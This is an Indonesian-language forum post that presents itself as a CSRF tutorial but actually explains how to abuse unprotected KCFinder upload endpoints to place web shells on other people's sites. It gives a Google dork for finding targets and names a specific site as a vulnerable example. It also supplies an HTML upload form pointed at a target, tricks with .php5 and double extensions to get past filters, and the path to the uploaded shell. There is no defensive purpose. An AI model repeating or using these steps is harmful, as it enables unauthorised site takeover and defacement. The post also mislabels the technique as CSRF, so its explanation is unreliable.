» » » Tutorial TUTORIAL USE CSRF EXPLOIT AND METHOD
, Edit

Tutorial TUTORIAL USE CSRF EXPLOIT AND METHOD

WELCOME TO MY F*CKING TREADS. 

SUDAH 3 Tahun lamanya ga nimbrung disni lagi... Kaget 

yosh,, semenjak akun "caesar12" gw lupa password.. dan skarang muncul lagi dengan tema yang berbeda Yes 



Ok gw mau ngebahas tentang APA ITU CSRF ( Cross Site Request Forgery ) dan cara + contoh exploitasinya Yes 

males panjang lebar gw ngebahas CSRF.. mnding di baca aja

FOR LINK

Ok langsung Ke tahap Contoh exploitnya..

gw coba pake exploit KCFINDER ( Klo orang bilang sih exploit bocah ) Bete 

untuk script csrfnya + dork google untuk mencari site yang vulnarable :

DORK : inurl:/kcfinder/upload/images/

NB : CONTOH WEB YANG VULNARABLE AKAN MUNCUL ALERT DENGAN TULISAN "Unknown error"

EXAMPLE SITE VULN : http://www.termediagnano.it/bck/kcfinder/upload.php

Code:
<form method="POST" action="http://whatthehell.go.id/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form>



Untuk Akses File / Shell Mu :
PHP Code:
http://whatthehell.go.id/path/kcfinder/upload/files/nama_filemu.php5http://whatthehell.go.id/path/kcfinder/upload/files/nama_filemu.php.yusa 

NB : tidak bisa langsung upload dengan extensi PHP.. why? coba tanya sama rumput yang bergoyang Joget2 

woke langkah selanjutnya
masukan web target ke dalam script CSRF dan simpan dengan extensi .html

buka script CSRF tadi menggunakan browsermu..
lalu upload shell / script mu disana

jika ada alert blank,, berarti tandanya filemu berhasil terupload Makan 
selain itu,, file mu tak bisa terupload.. Sapu 


SEKIAN TREADS DAN TUTORIAL DARI SAYA,, SEMOGA BERMANFAAT 
JIKA ADA YANG MASIH BELUM PAHAM BISA PM SAYA Hehe 

THNKS TO : INCEF TEAM

Related Posts :

0 Response to "Tutorial TUTORIAL USE CSRF EXPLOIT AND METHOD"

Post a Comment

Subscribe to: Post Comments (Atom)